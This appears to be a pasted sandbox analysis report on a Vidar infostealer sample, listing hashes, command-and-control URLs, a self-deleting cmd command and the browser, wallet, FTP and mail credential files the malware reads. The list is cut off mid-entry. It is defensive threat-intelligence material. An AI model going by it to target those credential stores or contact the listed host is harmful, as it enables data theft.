paladin316

Vidar_a85132af1b5651472eb4ad093e1bb0f5_exe.txt

Jul 22nd, 2019
114
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. * MalFamily: "Vidar"
  2.  
  3. * MalScore: 10.0
  4.  
  5. * File Name: "Vidar_a85132af1b5651472eb4ad093e1bb0f5.exe"
  6. * File Size: 684032
  7. * File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
  8. * SHA256: "012e9cbd15b3e19b703a118b0fb4c48df46a505416fb629b7764178f74cd8b53"
  9. * MD5: "a85132af1b5651472eb4ad093e1bb0f5"
  10. * SHA1: "280312657d13f403527b1b3cec7e577c1e5de64b"
  11. * SHA512: "1cbe8fd4394f72a0d4a904a06447ce07eb577d5d10adb44096e38bd5ab069d3752e3dba573f38512010a118df639cddcbb78231285f1c6f6dd14c1b0ccbe42df"
  12. * CRC32: "BFC0FAFA"
  13. * SSDEEP: "12288:TEtUmRfjBeCq3SkqTJ3N4FsOevUBPqt4Ma5DG2/dIM9hbU2nv68mKQO:YKEfjB1q3Sl0mOpBCtzYVl9hQWLdQO"
  14.  
  15. * Process Execution:
  16. "Ursnif_a85132af1b5651472eb4ad093e1bb0f5.exe",
  17. "cmd.exe",
  18. "taskkill.exe",
  19. "services.exe",
  20. "svchost.exe",
  21. "WmiPrvSE.exe",
  22. "taskhost.exe"
  23.  
  24.  
  25. * Executed Commands:
  26. "C:\\Windows\\System32\\cmd.exe /c taskkill /im Ursnif_a85132af1b5651472eb4ad093e1bb0f5.exe /f & erase C:\\Users\\user\\AppData\\Local\\Temp\\Ursnif_a85132af1b5651472eb4ad093e1bb0f5.exe & exit",
  27. "C:\\Windows\\system32\\lsass.exe",
  28. "C:\\Windows\\system32\\svchost.exe -k netsvcs",
  29. "taskkill /im Ursnif_a85132af1b5651472eb4ad093e1bb0f5.exe /f"
  30.  
  31.  
  32. * Signatures Detected:
  33.  
  34. "Description": "Creates RWX memory",
  35. "Details":
  36.  
  37.  
  38. "Description": "A process attempted to delay the analysis task.",
  39. "Details":
  40.  
  41. "Process": "WmiPrvSE.exe tried to sleep 600 seconds, actually delayed analysis time by 0 seconds"
  42.  
  43.  
  44.  
  45.  
  46. "Description": "A process created a hidden window",
  47. "Details":
  48.  
  49. "Process": "Ursnif_a85132af1b5651472eb4ad093e1bb0f5.exe -> C:\\Windows\\System32\\cmd.exe"
  50.  
  51.  
  52.  
  53.  
  54. "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
  55. "Details":
  56.  
  57. "post_no_referer": "HTTP traffic contains a POST request with no referer header"
  58.  
  59.  
  60. "post_no_useragent": "HTTP traffic contains a POST request with no user-agent header"
  61.  
  62.  
  63. "get_no_useragent": "HTTP traffic contains a GET request with no user-agent header"
  64.  
  65.  
  66. "suspicious_request": "http://otnet.xyz/141"
  67.  
  68.  
  69. "suspicious_request": "http://otnet.xyz/freebl3.dll"
  70.  
  71.  
  72. "suspicious_request": "http://otnet.xyz/freebl3.dll?ddosprotected=1"
  73.  
  74.  
  75. "suspicious_request": "http://otnet.xyz/mozglue.dll"
  76.  
  77.  
  78. "suspicious_request": "http://otnet.xyz/msvcp140.dll"
  79.  
  80.  
  81. "suspicious_request": "http://otnet.xyz/nss3.dll"
  82.  
  83.  
  84. "suspicious_request": "http://otnet.xyz/softokn3.dll"
  85.  
  86.  
  87. "suspicious_request": "http://otnet.xyz/vcruntime140.dll"
  88.  
  89.  
  90. "suspicious_request": "http://ip-api.com/line/"
  91.  
  92.  
  93. "suspicious_request": "http://otnet.xyz/"
  94.  
  95.  
  96.  
  97.  
  98. "Description": "Performs some HTTP requests",
  99. "Details":
  100.  
  101. "url": "http://otnet.xyz/141"
  102.  
  103.  
  104. "url": "http://otnet.xyz/freebl3.dll"
  105.  
  106.  
  107. "url": "http://otnet.xyz/freebl3.dll?ddosprotected=1"
  108.  
  109.  
  110. "url": "http://otnet.xyz/mozglue.dll"
  111.  
  112.  
  113. "url": "http://otnet.xyz/msvcp140.dll"
  114.  
  115.  
  116. "url": "http://otnet.xyz/nss3.dll"
  117.  
  118.  
  119. "url": "http://otnet.xyz/softokn3.dll"
  120.  
  121.  
  122. "url": "http://otnet.xyz/vcruntime140.dll"
  123.  
  124.  
  125. "url": "http://ip-api.com/line/"
  126.  
  127.  
  128. "url": "http://otnet.xyz/"
  129.  
  130.  
  131.  
  132.  
  133. "Description": "Deletes its original binary from disk",
  134. "Details":
  135.  
  136.  
  137. "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
  138. "Details":
  139.  
  140. "Spam": "services.exe (500) called API GetSystemTimeAsFileTime 11879534 times"
  141.  
  142.  
  143.  
  144.  
  145. "Description": "Steals private information from local Internet browsers",
  146. "Details":
  147.  
  148. "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Cookies\\IE_Cookies.txt"
  149.  
  150.  
  151. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data"
  152.  
  153.  
  154. "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Cookies\\Google Chrome_Default.txt"
  155.  
  156.  
  157. "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Cookies\\Edge_Cookies.txt"
  158.  
  159.  
  160. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"
  161.  
  162.  
  163. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History"
  164.  
  165.  
  166. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies"
  167.  
  168.  
  169.  
  170.  
  171. "Description": "Collects information about installed applications",
  172. "Details":
  173.  
  174. "Program": "Google Update Helper"
  175.  
  176.  
  177. "Program": "Microsoft Excel MUI 2013"
  178.  
  179.  
  180. "Program": "Microsoft Outlook MUI 2013"
  181.  
  182.  
  183.  
  184.  
  185. "Program": "Google Chrome"
  186.  
  187.  
  188. "Program": "Adobe Flash Player 29 NPAPI"
  189.  
  190.  
  191. "Program": "Adobe Flash Player 29 ActiveX"
  192.  
  193.  
  194. "Program": "Microsoft DCF MUI 2013"
  195.  
  196.  
  197. "Program": "Microsoft Access MUI 2013"
  198.  
  199.  
  200. "Program": "Microsoft Office Proofing Tools 2013 - English"
  201.  
  202.  
  203. "Program": "Adobe Acrobat Reader DC"
  204.  
  205.  
  206. "Program": "Microsoft Office Proofing Tools 2013 - Espa\\xef\\xbf\\xb1ol"
  207.  
  208.  
  209. "Program": "Microsoft Publisher MUI 2013"
  210.  
  211.  
  212. "Program": "Outils de v\\xef\\xbf\\xa9rification linguistique 2013 de Microsoft Office\\xef\\xbe\\xa0- Fran\\xef\\xbf\\xa7ais"
  213.  
  214.  
  215. "Program": "Microsoft Office Shared MUI 2013"
  216.  
  217.  
  218. "Program": "Microsoft Office OSM MUI 2013"
  219.  
  220.  
  221. "Program": "Microsoft InfoPath MUI 2013"
  222.  
  223.  
  224. "Program": "Microsoft Office Shared Setup Metadata MUI 2013"
  225.  
  226.  
  227. "Program": "Microsoft Word MUI 2013"
  228.  
  229.  
  230. "Program": "Microsoft Groove MUI 2013"
  231.  
  232.  
  233.  
  234.  
  235. "Program": "Microsoft Access Setup Metadata MUI 2013"
  236.  
  237.  
  238. "Program": "Microsoft Office OSM UX MUI 2013"
  239.  
  240.  
  241. "Program": "Java Auto Updater"
  242.  
  243.  
  244. "Program": "Microsoft PowerPoint MUI 2013"
  245.  
  246.  
  247. "Program": "Microsoft Office Professional Plus 2013"
  248.  
  249.  
  250. "Program": "Adobe Refresh Manager"
  251.  
  252.  
  253. "Program": "Microsoft Office Proofing 2013"
  254.  
  255.  
  256. "Program": "Microsoft Lync MUI 2013"
  257.  
  258.  
  259.  
  260.  
  261. "Program": "Microsoft OneNote MUI 2013"
  262.  
  263.  
  264.  
  265.  
  266. "Description": "Checks the CPU name from registry, possibly for anti-virtualization",
  267. "Details":
  268.  
  269.  
  270. "Description": "Attempts to access Bitcoin/ALTCoin wallets",
  271. "Details":
  272.  
  273. "file": "C:\\Users\\user\\AppData\\Roaming\\Bitcoin\\*.dat"
  274.  
  275.  
  276. "file": "C:\\Users\\user\\AppData\\Roaming\\Bitcoin\\??"
  277.  
  278.  
  279. "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Bitcoin\\*.*"
  280.  
  281.  
  282. "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Bitcoin\\\\xe1\\x93\\x9d\\xe7\\x9b\\x9e"
  283.  
  284.  
  285. "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Electrum\\"
  286.  
  287.  
  288. "file": "C:\\Users\\user\\AppData\\Roaming\\Electrum\\wallets\\default_wallet"
  289.  
  290.  
  291. "file": "C:\\Users\\user\\AppData\\Roaming\\Electrum\\wallets\\"
  292.  
  293.  
  294. "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Electrum\\*.*"
  295.  
  296.  
  297. "file": "C:\\Users\\user\\AppData\\Roaming\\Litecoin\\"
  298.  
  299.  
  300. "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Litecoin\\"
  301.  
  302.  
  303. "file": "C:\\Users\\user\\AppData\\Roaming\\Litecoin\\*.dat"
  304.  
  305.  
  306. "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Litecoin\\*.*"
  307.  
  308.  
  309. "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\NameCoin\\"
  310.  
  311.  
  312. "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\NameCoin\\*.*"
  313.  
  314.  
  315. "file": "C:\\Users\\user\\AppData\\Roaming\\Namecoin\\"
  316.  
  317.  
  318. "file": "C:\\Users\\user\\AppData\\Roaming\\Namecoin\\*.dat"
  319.  
  320.  
  321. "file": "C:\\Users\\user\\AppData\\Roaming\\Terracoin\\*.dat"
  322.  
  323.  
  324. "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\TerraCoin\\*.*"
  325.  
  326.  
  327. "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\TerraCoin\\"
  328.  
  329.  
  330. "file": "C:\\Users\\user\\AppData\\Roaming\\Terracoin\\"
  331.  
  332.  
  333. "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\PrimeCoin\\"
  334.  
  335.  
  336. "file": "C:\\Users\\user\\AppData\\Roaming\\Primecoin\\"
  337.  
  338.  
  339. "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\PrimeCoin\\*.*"
  340.  
  341.  
  342. "file": "C:\\Users\\user\\AppData\\Roaming\\Primecoin\\*.dat"
  343.  
  344.  
  345. "file": "C:\\Users\\user\\AppData\\Roaming\\Freicoin\\*.dat"
  346.  
  347.  
  348. "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\FreiCoin\\"
  349.  
  350.  
  351. "file": "C:\\Users\\user\\AppData\\Roaming\\Freicoin\\"
  352.  
  353.  
  354. "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\FreiCoin\\*.*"
  355.  
  356.  
  357. "file": "C:\\Users\\user\\AppData\\Roaming\\devcoin\\"
  358.  
  359.  
  360. "file": "C:\\Users\\user\\AppData\\Roaming\\devcoin\\*.dat"
  361.  
  362.  
  363. "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\DevCoin\\"
  364.  
  365.  
  366. "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\DevCoin\\*.*"
  367.  
  368.  
  369. "file": "C:\\Users\\user\\AppData\\Roaming\\Franko\\*.dat"
  370.  
  371.  
  372. "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Franko\\"
  373.  
  374.  
  375. "file": "C:\\Users\\user\\AppData\\Roaming\\Franko\\"
  376.  
  377.  
  378. "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Franko\\*.*"
  379.  
  380.  
  381. "file": "C:\\Users\\user\\AppData\\Roaming\\Megacoin\\*.dat"
  382.  
  383.  
  384. "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\MegaCoin\\*.*"
  385.  
  386.  
  387. "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\MegaCoin\\"
  388.  
  389.  
  390. "file": "C:\\Users\\user\\AppData\\Roaming\\Megacoin\\"
  391.  
  392.  
  393. "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\InfiniteCoin\\"
  394.  
  395.  
  396. "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\InfiniteCoin\\*.*"
  397.  
  398.  
  399. "file": "C:\\Users\\user\\AppData\\Roaming\\Infinitecoin\\*.dat"
  400.  
  401.  
  402. "file": "C:\\Users\\user\\AppData\\Roaming\\Infinitecoin\\"
  403.  
  404.  
  405. "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\IxCoin\\"
  406.  
  407.  
  408. "file": "C:\\Users\\user\\AppData\\Roaming\\Ixcoin\\"
  409.  
  410.  
  411. "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\IxCoin\\*.*"
  412.  
  413.  
  414. "file": "C:\\Users\\user\\AppData\\Roaming\\Ixcoin\\*.dat"
  415.  
  416.  
  417. "file": "C:\\Users\\user\\AppData\\Roaming\\Anoncoin\\"
  418.  
  419.  
  420. "file": "C:\\Users\\user\\AppData\\Roaming\\Anoncoin\\*.dat"
  421.  
  422.  
  423. "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Anoncoin\\"
  424.  
  425.  
  426. "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Anoncoin\\*.*"
  427.  
  428.  
  429. "file": "C:\\Users\\user\\AppData\\Roaming\\BBQCoin\\*.dat"
  430.  
  431.  
  432. "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\BBQCoin\\"
  433.  
  434.  
  435. "file": "C:\\Users\\user\\AppData\\Roaming\\BBQCoin\\"
  436.  
  437.  
  438. "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\BBQCoin\\*.*"
  439.  
  440.  
  441. "file": "C:\\Users\\user\\AppData\\Roaming\\digitalcoin\\*.dat"
  442.  
  443.  
  444. "file": "C:\\Users\\user\\AppData\\Roaming\\digitalcoin\\"
  445.  
  446.  
  447. "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\DigitalCoin\\*.*"
  448.  
  449.  
  450. "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\DigitalCoin\\"
  451.  
  452.  
  453. "file": "C:\\Users\\user\\AppData\\Roaming\\Mincoin\\*.dat"
  454.  
  455.  
  456. "file": "C:\\Users\\user\\AppData\\Roaming\\Mincoin\\"
  457.  
  458.  
  459. "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\MinCoin\\*.*"
  460.  
  461.  
  462. "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\MinCoin\\"
  463.  
  464.  
  465. "file": "C:\\Users\\user\\AppData\\Roaming\\GoldCoin (GLD)\\*.dat"
  466.  
  467.  
  468. "file": "C:\\Users\\user\\AppData\\Roaming\\GoldCoin (GLD)\\"
  469.  
  470.  
  471. "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\YACoin\\"
  472.  
  473.  
  474. "file": "C:\\Users\\user\\AppData\\Roaming\\YACoin\\*.dat"
  475.  
  476.  
  477. "file": "C:\\Users\\user\\AppData\\Roaming\\YACoin\\"
  478.  
  479.  
  480. "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\YACoin\\*.*"
  481.  
  482.  
  483. "file": "C:\\Users\\user\\AppData\\Roaming\\Florincoin\\*.dat"
  484.  
  485.  
  486. "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\FlorinCoin\\"
  487.  
  488.  
  489. "file": "C:\\Users\\user\\AppData\\Roaming\\Florincoin\\"
  490.  
  491.  
  492. "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\FlorinCoin\\*.*"
  493.  
  494.  
  495.  
  496.  
  497. "Description": "Harvests credentials from local FTP client softwares",
  498. "Details":
  499.  
  500. "file": "C:\\Users\\user\\AppData\\Roaming\\FileZilla\\recentservers.xml"
  501.  
  502.  
  503.  
  504.  
  505. "Description": "Harvests information related to installed instant messenger clients",
  506. "Details":
  507.  
  508. "file": "C:\\Users\\user\\AppData\\Roaming\\.purple\\accounts.xml"
  509.  
  510.  
  511.  
  512.  
  513. "Description": "Harvests information related to installed mail clients",
  514. "Details":
  515.  
  516. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003"
  517.  
  518.  
  519. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000007"
  520.  
  521.  
  522. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000006"
  523.  
  524.  
  525. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000005"
  526.  
  527.  
  528. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000004"
  529.  
  530.  
  531. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000009"
  532.  
  533.  
  534. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000008"
  535.  
  536.  
  537.  
  538.  
  539. "Description": "Collects information to fingerprint the system",
  540. "Details":
  541.  
  542.  
  543. "Description": "Created network traffic indicative of malicious activity",
  544. "Details":
  545.  
  546. "signature": "ET TROJAN Vidar/Arkei Stealer Client Data Upload"
  547.  
  548.  
  549.  
  550.  
  551.  
  552. * Started Service:
  553. "VaultSvc"
  554.  
  555.  
  556. * Mutexes:
  557. "00000000-0000-0000-0000-0000000000003d3783a0-703a-11de-8c7a-806e6f6e6963"
  558.  
  559.  
  560. * Modified Files:
  561. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\passwords.txt",
  562. "C:\\ProgramData\\freebl3.dll",
  563. "C:\\ProgramData\\mozglue.dll",
  564. "C:\\ProgramData\\msvcp140.dll",
  565. "C:\\ProgramData\\nss3.dll",
  566. "C:\\ProgramData\\softokn3.dll",
  567. "C:\\ProgramData\\vcruntime140.dll",
  568. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\ld",
  569. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\historych",
  570. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\History\\Google Chrome_Default.txt",
  571. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Downloads\\Google Chrome_Default.txt",
  572. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\c",
  573. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Cookies\\Google Chrome_Default.txt",
  574. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\wd",
  575. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Autofill\\Google Chrome_Default.txt",
  576. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\CC\\Google Chrome_Default.txt",
  577. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Soft\\Authy\\\\xea\\x9b\\xb0\\xce\\x90\\xeb\\x82\\xa8\\xc8\\xa7\\xef\\xba\\xa0\\xc8\\xbf\\xe9\\x93\\x90\\xc8\\xb8",
  578. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Cookies\\IE_Cookies.txt",
  579. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Cookies\\Edge_Cookies.txt",
  580. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\cookie_list.txt",
  581. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\outlook.txt",
  582. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\information.txt",
  583. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Files\\Default.zip",
  584. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Bitcoin\\\\xe1\\x93\\x9d\\xe7\\x9b\\x9e",
  585. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Ethereum\\",
  586. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Electrum\\",
  587. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\ElectrumLTC\\\r",
  588. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Exodus\\",
  589. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\ElectronCash\\\r",
  590. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\MultiDoge\\",
  591. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Zcash\\",
  592. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\DashCore\\",
  593. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Litecoin\\",
  594. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Anoncoin\\",
  595. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\BBQCoin\\",
  596. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\DevCoin\\",
  597. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\DigitalCoin\\",
  598. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\FlorinCoin\\",
  599. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Franko\\",
  600. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\FreiCoin\\",
  601. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\GoldCoinGLD\\",
  602. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\InfiniteCoin\\",
  603. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\IOCoin\\",
  604. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\IxCoin\\",
  605. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\MegaCoin\\",
  606. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\MinCoin\\",
  607. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\NameCoin\\",
  608. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\PrimeCoin\\",
  609. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\TerraCoin\\",
  610. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\YACoin\\",
  611. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\JAXX\\\r",
  612. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\screenshot.jpg",
  613. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\CA_00000000-0000-0000-0000-0000000000004771908667.zip",
  614. "C:\\Windows\\sysnative\\LogFiles\\Scm\\5869f1c1-01d7-41f7-84b7-715672259fa8",
  615. "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2PROVIDERSUBSYSTEM"
  616.  
  617.  
  618. * Deleted Files:
  619. "C:\\ProgramData\\freebl3.dll",
  620. "C:\\ProgramData\\mozglue.dll",
  621. "C:\\ProgramData\\msvcp140.dll",
  622. "C:\\ProgramData\\nss3.dll",
  623. "C:\\ProgramData\\softokn3.dll",
  624. "C:\\ProgramData\\vcruntime140.dll",
  625. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Autofill\\Google Chrome_Default.txt",
  626. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Autofill",
  627. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\CC\\Google Chrome_Default.txt",
  628. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\CC",
  629. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Cookies\\Edge_Cookies.txt",
  630. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Cookies\\Google Chrome_Default.txt",
  631. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Cookies\\IE_Cookies.txt",
  632. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Cookies",
  633. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\cookie_list.txt",
  634. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Downloads\\Google Chrome_Default.txt",
  635. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Downloads",
  636. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Files\\Default.zip",
  637. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Files",
  638. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\History\\Google Chrome_Default.txt",
  639. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\History",
  640. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\information.txt",
  641. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\outlook.txt",
  642. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\passwords.txt",
  643. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\screenshot.jpg",
  644. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Soft\\Authy",
  645. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Soft",
  646. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Anoncoin",
  647. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\BBQCoin",
  648. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Bitcoin",
  649. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\DashCore",
  650. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\DevCoin",
